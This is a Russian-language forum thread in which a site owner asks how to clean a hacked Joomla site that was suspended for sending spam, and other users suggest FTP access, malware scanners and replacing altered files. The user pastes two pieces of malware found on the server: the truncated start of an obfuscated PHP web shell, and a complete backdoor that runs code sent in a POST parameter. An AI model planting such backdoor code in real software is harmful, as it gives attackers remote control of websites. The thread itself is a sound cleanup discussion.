Как восстановить сайт с вредоносным кодом?

Автор anka17, 08-01-2014, 01:58:33

« назад - далее »

anka17Topic starter

Приветствую всех и прошу помощи! Из-за новогодних и рождественских праздников забросила свой сайт на 2 недели. А сегодня зашла и увидела надпись от хостера: работа сайта приостановлена. Причем работа приостановлена как на сайте, так и в админке и в сипанели. Тоесть доступа к файлам у меня нет( Написала хостеру, а мне выдали такое: с вашего сайта рассылается спам, решайте проблему и мы восстановим работу сайта. Но как же я решу проблему, если доступа к файлам у меня нет? Хостер пока молчит, а меня нервирует ситуация. Раньше посещаемость сайта была более менее нормальная. А сейчас упала до нуля почти. И это при том, что по многим сч сайт был выведен на первую страницу поиска. Что делать в таком случае? Можно ли вообще попросить самого хостера поискать заразу. И если сайт рассылает спам, то я так понимаю его взломали. И если честно, я вообще не понимаю, где и как искать место взлома и как без доступа восстанавливать файлы. Поэтому прошу ваших советов, а может и помощи!
http://newscultures.blogspot.com/
  •  


Ruson

Ну ftp доступ должен у вас быть, если они и его заблочили , а такое бывает, просите, что-бы открыли хотя бы доступ по ftp


Гарик+

Здесь для начала только переписка с хостером, чтобы открыли доступ к фтп и БД. Без этого получается замкнутый круг, они от вас требуют устранить проблемы, а вы этого сделать не в состоянии по причине отсутствия возможности по вине хостера.
А затем проверяйте ай-болитом сайт и устраняйте обнаруженные проблемы.

anka17Topic starter

#3
Доступ к файлам получила, просканировала папки разными антивирусами, все чисто. Посоветуйте, что нужно искать? Попробовала посмотреть все папки по дате изменения и нашла несколько измененных, которые я явно в эти даты не меняла. Но код выглядит вроде нормально. Никаких подозрительных непонятных каракуль я не нашла. Посоветуйте, как выявить вредоносный код пожалуйста!!!
Единственное, с чем я не знаю что делать, так это с файлами png и типом файла x-generic. При открытии этих файлов появляются непонятные каракули с квадратиками и сердечками или вопросами внутри. Что делать с этими файлами? Не сочтите мои вопросы за тупость пожалуйста. В базовых тегах я разбираюсь, а вот с чем-то посложнее встаю в ступор.

И еще подскажите, что делать с файлами error_log?
http://newscultures.blogspot.com/
  •  

Гарик+

#4
Сюда идём.  :)  http://www.sbup.com/seo-forum/zashita_saita_ot_vzloma/kak_naiti_vredonosnyi_kod/

Добавлено: 09-01-2014, 19:30:51


Цитата: anka17 от 09-01-2014, 19:26:24

Единственное, с чем я не знаю что делать, так это с файлами png и типом файла x-generic. При открытии этих файлов появляются непонятные каракули с квадратиками и сердечками или вопросами внутри. Что делать с этими файлами?
Ничего не делать.. :) Это изображения


anka17Topic starter

Спасибо за ссылочку. Но у меня появился новый вопрос с подключением к SSH. Почитала инструкцию как подключаться и как пользоваться. Но что-то не получается. В итоге всех манипуляций вылазит черное окошко, а через 3 секунды пишет сессия истекла. Что я могу делать не так?

И еще. Нашла странный появившийся файл с таким содержанием:
<?php
//$auth_pass = "хxххxххxххxххxххxххxхх";
$auth_pass = "";
if(!empty($auth_pass)){
   $auth_pass = md5($auth_pass);
}
$color = "#df5";
$deault_action = 'FilesMan';
$defalt_use_ajax = true;
$defalt_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57rut+fk/

и дальше прочие каракули. Антивирус реагирует на файл и выдает угрозу. Вопрос: файл просто удалять целиком или только каракули?
http://newscultures.blogspot.com/
  •  

Гарик+

1.Как файл называется, где находится?
Самое простое решение такое. Отключите временно антивирус, сохраните файл на рабочем столе компа, никакого вреда от этого не будет и попробуйте удалить файл целиком. Судя по всему это закодированная вставка вредоносного кода, на которую и ругается антивирус
Для более точного ответа надо видеть весь файл и необходимо знать что за CMS используется для сайта.

Добавлено: 09-01-2014, 23:16:18


Цитата: anka17 от 09-01-2014, 22:51:46
Спасибо за ссылочку. Но у меня появился новый вопрос с подключением к SSH. Почитала инструкцию как подключаться и как пользоваться. Но что-то не получается. В итоге всех манипуляций вылазит черное окошко, а через 3 секунды пишет сессия истекла. Что я могу делать не так?

Воспользуйтесь обычным фтп для этого случая. Быстрее получится.

anka17Topic starter

CMS - joomla
зараженный файл находится в папке plugins/user/example и называется itX90n.php.

Никаких вставок iframов я в папках не нашла. Оно и понятно, кто будет так палиться))) теперь рыскаю в поисках eval и base64. Опять же вопрос по этому поводу. Просматриваю файлы в основном по дате изменения и в некоторых файлах встретила такие куски:
version = "1.3";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
    $fv = base64_decode($_POST["gjwqweodsa"]);
    @eval($fv);
    //@eval($_POST["gjwqweodsa"]);
}else{
    $mpath =  realpath("")."/";
    //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
    if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$_POST["gjwqweodsa"]."\n?>")){
        @include_once($mpath."dsadasdsa1fag1.php");
        @unlink($mpath."dsadasdsa1fag1.php");
    }else{
        echo "ERROR! CANT DO NOTHING!";
    }
}
}

Что делать с такими кусками? встречаются в modules
А еще встречаются куски, где текст наложен на текст и из-под него проглядывает еле заметный другой текст.

Главное, как распознать код в файле index.php? Файл был явно изменен, но не мной. Да и все там так красиво расписано, с моей стороны чайника и придраться не к чему(((

Цитировать
Воспользуйтесь обычным фтп для этого случая. Быстрее получится.
А ай болит и через фтп работает? просто в инструкции о ssh говорится.
http://newscultures.blogspot.com/
  •  


Гарик+

#8
http://www.revisium.com/ai/

ЦитироватьКак пользоваться скриптом

Прочитайте инструкцию в архиве скрипта, если вам нужно включить экспертный режим сканирования. По-умолчанию сканирует в обычном режиме с минимальным количеством сигнатур и минимальным числом ложных срабатываний.

Вариант запуска из браузера (не рекомендуется, так как выполняет только экспресс-сканирование)

    Скачать архив со скриптом
    Распаковать .zip
    Поменять пароль в строке define('PASS', 'put_any_strong_password_here');
    Включить режим "эксперт" в строке define('AI_EXPERT', 0);
    Загрузить в корневую директорию сайта
    Открыть в браузере http://ваш_сайт/ai-bolit.php?p=ваш_пароль

Этот способ как бы "не рекомендуемый", но вполне работоспособный и я с его помощью находил практически всё..

ЦитироватьГлавное, как распознать код в файле index.php? Файл был явно изменен, но не мной. Да и все там так красиво расписано, с моей стороны чайника и придраться не к чему(((
Да не парьтесь. Возьмите просто готовый из другой аналогичной версии джумлы, он везде будет одинаков.


anka17Topic starter

Народ! Просвятите пожалуйста еще в одном вопросе. Существует ли у хостера доступ к админке моего сайта и моей сипанельки? Или кроме меня никто такого доступа не имеет?
http://newscultures.blogspot.com/
  •